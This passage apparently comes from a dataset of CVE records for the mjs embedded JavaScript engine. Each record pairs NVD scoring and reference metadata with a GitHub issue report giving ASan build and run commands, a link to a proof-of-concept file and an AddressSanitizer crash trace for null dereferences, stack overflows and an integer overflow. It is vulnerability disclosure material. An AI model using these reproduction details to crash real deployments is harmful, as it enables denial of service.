test/mjs-uaf/build_asan/mjs.c:6000 #173 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #174 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #175 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #176 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #177 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #178 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #179 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #180 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #181 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #182 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #183 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #184 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #185 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #186 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #187 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #188 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #189 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #190 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #191 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #192 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #193 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #194 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #195 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #196 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #197 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #198 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #199 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #200 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #201 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #202 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #203 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #204 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #205 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #206 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #207 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #208 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #209 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #210 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #211 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #212 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #213 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #214 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #215 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #216 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #217 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #218 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #219 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #220 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #221 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #222 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #223 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #224 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #225 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #226 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #227 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #228 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #229 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #230 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #231 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #232 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #233 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #234 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #235 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #236 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #237 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #238 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #239 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #240 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #241 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #242 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #243 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #244 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #245 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #246 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #247 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #248 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #249 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #250 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #251 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 SUMMARY: AddressSanitizer: stack-overflow ??:0 ?? ==29997==ABORTING ```
AddressSanitizer: stack-buffer-overflow in json_parse_array() mjs.c:5952
https://api.github.com/repos/cesanta/mjs/issues/158/comments
0
2021-05-19T08:36:33Z
2021-05-19T08:36:33Z
https://github.com/cesanta/mjs/issues/158
895,156,817
158
CVE-2021-33439
2022-07-26T13:15:08.677
An issue was discovered in mjs (mJS: Restricted JavaScript engine), ES6 (JavaScript version 6). There is Integer overflow in gc_compact_strings() in mjs.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/159" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:*:*:*:*:*:*:*:*", "matchCriteriaId": "13B1A3EF-A920-4FB4-BD11-F97092B362F7", "versionEndExcluding": "2.20.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/cesanta/mjs/issues/159
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, mjs (latest master 4c870e5) Compile Command: ``` $ gcc -fsanitize=address -fno-omit-frame-pointer -DMJS_MAIN mjs.c -ldl -g -o mjs ``` Run Command: ``` $ mjs -f $POC ``` POC file: https://github.com/Clingto/POC/blob/master/MSA/mjs/mjs-8d05d-gc_compact_strings-negative-size-param ASAN info: ```C ==10043==ERROR: AddressSanitizer: negative-size-param: (size=-2133205735) #0 0x7f03ca4b105d in __asan_memmove (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x8d05d) #1 0x42dd05 in gc_compact_strings test/mjs-uaf/build_asan/mjs.c:11575 #2 0x42e26a in mjs_gc test/mjs-uaf/build_asan/mjs.c:11646 #3 0x42df57 in maybe_gc test/mjs-uaf/build_asan/mjs.c:11592 #4 0x424572 in mjs_execute test/mjs-uaf/build_asan/mjs.c:9375 #5 0x4265f1 in mjs_exec_internal test/mjs-uaf/build_asan/mjs.c:9866 #6 0x426873 in mjs_exec_file test/mjs-uaf/build_asan/mjs.c:9889 #7 0x431348 in main test/mjs-uaf/build_asan/mjs.c:12228 #8 0x7f03c9e7682f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #9 0x401af8 in _start ( test/mjs-uaf/bin_asan/bin/mjs_bin+0x401af8) 0x7f01c397fe41 is located 2702202433 bytes inside of 4863964088-byte region [0x7f012287a800,0x7f024471dbb8) allocated by thread T0 here: #0 0x7f03ca4bc961 in realloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98961) #1 0x402baa in mbuf_resize test/mjs-uaf/build_asan/mjs.c:4878 #2 0x43f0fb in mjs_mk_string test/mjs-uaf/build_asan/mjs.c:13934 #3 0x4403f9 in s_concat test/mjs-uaf/build_asan/mjs.c:14115 #4 0x422362 in do_op test/mjs-uaf/build_asan/mjs.c:8996 #5 0x42247a in op_assign test/mjs-uaf/build_asan/mjs.c:9009 #6 0x4231f9 in exec_expr test/mjs-uaf/build_asan/mjs.c:9212 #7 0x4259f6 in mjs_execute test/mjs-uaf/build_asan/mjs.c:9683 #8 0x4265f1 in mjs_exec_internal test/mjs-uaf/build_asan/mjs.c:9866 #9 0x426873 in mjs_exec_file test/mjs-uaf/build_asan/mjs.c:9889 #10 0x431348 in main test/mjs-uaf/build_asan/mjs.c:12228 #11 0x7f03c9e7682f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) SUMMARY: AddressSanitizer: negative-size-param ??:0 __asan_memmove ==10043==ABORTING ```
AddressSanitizer: negative-size-param in gc_compact_strings() mjs.c:11575
https://api.github.com/repos/cesanta/mjs/issues/159/comments
0
2021-05-19T08:37:26Z
2021-05-19T08:37:26Z
https://github.com/cesanta/mjs/issues/159
895,157,862
159
CVE-2021-33440
2022-07-26T13:15:08.717
An issue was discovered in mjs (mJS: Restricted JavaScript engine), ES6 (JavaScript version 6). There is NULL pointer dereference in mjs_bcode_commit() in mjs.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/163" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:*:*:*:*:*:*:*:*", "matchCriteriaId": "13B1A3EF-A920-4FB4-BD11-F97092B362F7", "versionEndExcluding": "2.20.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/cesanta/mjs/issues/163
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, mjs (latest master 4c870e5) Compile Command: ``` $ gcc -fsanitize=address -fno-omit-frame-pointer -DMJS_MAIN mjs.c -ldl -g -o mjs ``` Run Command: ``` $ mjs -f $POC ``` POC file: https://github.com/Clingto/POC/blob/master/MSA/mjs/mjs-7954-mjs_bcode_commit-null-pointer-deref ASAN info: ```C ASAN:SIGSEGV ================================================================= ==8485==ERROR: AddressSanitizer: SEGV on unknown address 0x00000001dce5 (pc 0x00000041dada bp 0x7ffcd7b8dcf0 sp 0x7ffcd7b8da28 T0) #0 0x41dad9 in mjs_bcode_commit test/mjs-uaf/build_asan/mjs.c:8051 #1 0x4265f1 in mjs_exec_internal test/mjs-uaf/build_asan/mjs.c:9866 #2 0x426873 in mjs_exec_file test/mjs-uaf/build_asan/mjs.c:9889 #3 0x431348 in main test/mjs-uaf/build_asan/mjs.c:12228 #4 0x7fb23d82f82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #5 0x401af8 in _start ( test/mjs-uaf/bin_asan/bin/mjs_bin+0x401af8) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV test/mjs-uaf/build_asan/mjs.c:8051 mjs_bcode_commit ==8485==ABORTING ```
A NULL pointer dereference in the function mjs_bcode_commit() mjs.c:8051
https://api.github.com/repos/cesanta/mjs/issues/163/comments
0
2021-05-19T08:40:50Z
2021-05-19T08:40:50Z
https://github.com/cesanta/mjs/issues/163
895,161,871
163
CVE-2021-33441
2022-07-26T13:15:08.757
An issue was discovered in mjs (mJS: Restricted JavaScript engine), ES6 (JavaScript version 6). There is NULL pointer dereference in exec_expr() in mjs.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/165" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:*:*:*:*:*:*:*:*", "matchCriteriaId": "13B1A3EF-A920-4FB4-BD11-F97092B362F7", "versionEndExcluding": "2.20.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/cesanta/mjs/issues/165
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, mjs (latest master 4c870e5) Compile Command: ``` $ gcc -fsanitize=address -fno-omit-frame-pointer -DMJS_MAIN mjs.c -ldl -g -o mjs ``` Run Command: ``` $ mjs -f $POC ``` POC file: https://github.com/Clingto/POC/blob/master/MSA/mjs/mjs-9035-exec_expr-null-pointer-deref ASAN info: ```C ASAN:SIGSEGV ================================================================= ==9001==ERROR: AddressSanitizer: SEGV on unknown address 0x00000042a6c5 (pc 0x000000422d9c bp 0x7ffd55fb7a40 sp 0x7ffd55fb7910 T0) #0 0x422d9b in exec_expr test/mjs-uaf/build_asan/mjs.c:9144 #1 0x4259f6 in mjs_execute test/mjs-uaf/build_asan/mjs.c:9683 #2 0x4265f1 in mjs_exec_internal test/mjs-uaf/build_asan/mjs.c:9866 #3 0x426873 in mjs_exec_file test/mjs-uaf/build_asan/mjs.c:9889 #4 0x431348 in main test/mjs-uaf/build_asan/mjs.c:12228 #5 0x7f019dc4882f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #6 0x401af8 in _start ( test/mjs-uaf/bin_asan/bin/mjs_bin+0x401af8) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV test/mjs-uaf/build_asan/mjs.c:9144 exec_expr ==9001==ABORTING ```
A NULL pointer dereference in the function exec_expr() mjs.c:9144
https://api.github.com/repos/cesanta/mjs/issues/165/comments
0
2021-05-19T08:42:37Z
2021-05-19T08:42:37Z
https://github.com/cesanta/mjs/issues/165
895,163,896
165
CVE-2021-33442
2022-07-26T13:15:08.803
An issue was discovered in mjs (mJS: Restricted JavaScript engine), ES6 (JavaScript version 6). There is NULL pointer dereference in json_printf() in mjs.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/161" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:*:*:*:*:*:*:*:*", "matchCriteriaId": "13B1A3EF-A920-4FB4-BD11-F97092B362F7", "versionEndExcluding": "2.20.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/cesanta/mjs/issues/161
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, mjs (latest master 4c870e5) Compile Command: ``` $ gcc -fsanitize=address -fno-omit-frame-pointer -DMJS_MAIN mjs.c -ldl -g -o mjs ``` Run Command: ``` $ mjs -f $POC ``` POC file: https://github.com/Clingto/POC/blob/master/MSA/mjs/mjs-6368-json_printf-null-pointer-deref ASAN info: ```C ASAN:SIGSEGV ================================================================= ==31649==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000040e9b8 bp 0x7fff1c80ad38 sp 0x7fff1c80abe8 T0) #0 0x40e9b7 in json_printf test/mjs-uaf/build_asan/mjs.c:6396 #1 0x444aee in mjs_jprintf test/mjs-uaf/build_asan/mjs.c:14741 #2 0x44511a in mjs_fprintf test/mjs-uaf/build_asan/mjs.c:14781 #3 0x41dd43 in mjs_print test/mjs-uaf/build_asan/mjs.c:8088 #4 0x7fff1c80af6f (<unknown module>) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV test/mjs-uaf/build_asan/mjs.c:6396 json_printf ==31649==ABORTING ```
A NULL pointer dereference in the function json_printf() mjs.c:6396
https://api.github.com/repos/cesanta/mjs/issues/161/comments
0
2021-05-19T08:39:12Z
2021-05-19T08:39:12Z
https://github.com/cesanta/mjs/issues/161
895,160,290
161
CVE-2021-33443
2022-07-26T13:15:08.847
An issue was discovered in mjs (mJS: Restricted JavaScript engine), ES6 (JavaScript version 6). There is stack buffer overflow in mjs_execute() in mjs.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/167" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:*:*:*:*:*:*:*:*", "matchCriteriaId": "13B1A3EF-A920-4FB4-BD11-F97092B362F7", "versionEndExcluding": "2.20.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/cesanta/mjs/issues/167
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, mjs (latest master 4c870e5) Compile Command: ``` $ gcc -fsanitize=address -fno-omit-frame-pointer -DMJS_MAIN mjs.c -ldl -g -o mjs ``` Run Command: ``` $ mjs -f $POC ``` POC file: https://github.com/Clingto/POC/blob/master/MSA/mjs/mjs-9522-mjs_execute-stack-overflow ASAN info: ```C ASAN:SIGSEGV ================================================================= ==9792==ERROR: AddressSanitizer: stack-overflow on address 0x7ffc50dbbc70 (pc 0x000000425735 bp 0x7ffc50dafdf0 sp 0x7ffc50dbbc78 T0) #0 0x425734 in mjs_execute test/mjs-uaf/build_asan/mjs.c:9650 #1 0x4265f1 in mjs_exec_internal test/mjs-uaf/build_asan/mjs.c:9866 #2 0x426873 in mjs_exec_file test/mjs-uaf/build_asan/mjs.c:9889 #3 0x431348 in main test/mjs-uaf/build_asan/mjs.c:12228 #4 0x7fa093d7e82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #5 0x401af8 in _start ( test/mjs-uaf/bin_asan/bin/mjs_bin+0x401af8) SUMMARY: AddressSanitizer: stack-overflow test/mjs-uaf/build_asan/mjs.c:9650 mjs_execute ==9792==ABORTING ```
AddressSanitizer: stack-buffer-overflow in mjs_execute mjs.c:9650
https://api.github.com/repos/cesanta/mjs/issues/167/comments
0
2021-05-19T08:44:06Z
2021-05-19T08:44:06Z
https://github.com/cesanta/mjs/issues/167
895,165,377
167
CVE-2021-33444
2022-07-26T13:15:08.887
An issue was discovered in mjs (mJS: Restricted JavaScript engine), ES6 (JavaScript version 6). There is NULL pointer dereference in getprop_builtin_foreign() in mjs.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/166" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:*:*:*:*:*:*:*:*", "matchCriteriaId": "13B1A3EF-A920-4FB4-BD11-F97092B362F7", "versionEndExcluding": "2.20.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/cesanta/mjs/issues/166
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, mjs (latest master 4c870e5) I think it is probably a similar issue as [#114](https://github.com/cesanta/mjs/issues/114) Compile Command: ``` $ gcc -fsanitize=address -fno-omit-frame-pointer -DMJS_MAIN mjs.c -ldl -g -o mjs ``` Run Command: ``` $ mjs -f $POC ``` POC file: https://github.com/Clingto/POC/blob/master/MSA/mjs/mjs-9187-getprop_builtin_foreign-null-pointer-deref ASAN info: ```C ASAN:SIGSEGV ================================================================= ==9391==ERROR: AddressSanitizer: SEGV on unknown address 0x000004a7dc5d (pc 0x000000423a8c bp 0x7ffe565a5270 sp 0x7ffe565a51b0 T0) #0 0x423a8b in getprop_builtin_foreign test/mjs-uaf/build_asan/mjs.c:9298 #1 0x42407e in getprop_builtin test/mjs-uaf/build_asan/mjs.c:9335 #2 0x424c51 in mjs_execute test/mjs-uaf/build_asan/mjs.c:9485 #3 0x4265f1 in mjs_exec_internal test/mjs-uaf/build_asan/mjs.c:9866 #4 0x426873 in mjs_exec_file test/mjs-uaf/build_asan/mjs.c:9889 #5 0x431348 in main test/mjs-uaf/build_asan/mjs.c:12228 #6 0x7febbe9ac82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #7 0x401af8 in _start ( test/mjs-uaf/bin_asan/bin/mjs_bin+0x401af8) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV test/mjs-uaf/build_asan/mjs.c:9298 getprop_builtin_foreign ==9391==ABORTING ```
A NULL pointer dereference in the function getprop_builtin_foreign() mjs.c:9298
https://api.github.com/repos/cesanta/mjs/issues/166/comments
0
2021-05-19T08:43:21Z
2021-05-19T08:43:21Z
https://github.com/cesanta/mjs/issues/166
895,164,624
166
CVE-2021-33445
2022-07-26T13:15:08.927
An issue was discovered in mjs (mJS: Restricted JavaScript engine), ES6 (JavaScript version 6). There is NULL pointer dereference in mjs_string_char_code_at() in mjs.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/169" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:*:*:*:*:*:*:*:*", "matchCriteriaId": "13B1A3EF-A920-4FB4-BD11-F97092B362F7", "versionEndExcluding": "2.20.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/cesanta/mjs/issues/169
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, mjs (latest master 4c870e5) Compile Command: ``` $ gcc -fsanitize=address -fno-omit-frame-pointer -DMJS_MAIN mjs.c -ldl -g -o mjs ``` Run Command: ``` $ mjs -f $POC ``` POC file: https://github.com/Clingto/POC/blob/master/MSA/mjs/mjs-13891-mjs_string_char_code_at-null-pointer-deref ASAN info: ```C ASAN:SIGSEGV ================================================================= ==28983==ERROR: AddressSanitizer: SEGV on unknown address 0x618008111179 (pc 0x000000440f53 bp 0x7ffe126104c0 sp 0x7ffe126103c0 T0) #0 0x440f52 in mjs_string_char_code_at test/mjs-uaf/build_asan/mjs.c:14234 #1 0x42572a in mjs_execute test/mjs-uaf/build_asan/mjs.c:9648 #2 0x4265f1 in mjs_exec_internal test/mjs-uaf/build_asan/mjs.c:9866 #3 0x426873 in mjs_exec_file test/mjs-uaf/build_asan/mjs.c:9889 #4 0x431348 in main test/mjs-uaf/build_asan/mjs.c:12228 #5 0x7fbb2940582f in __libc_start_main 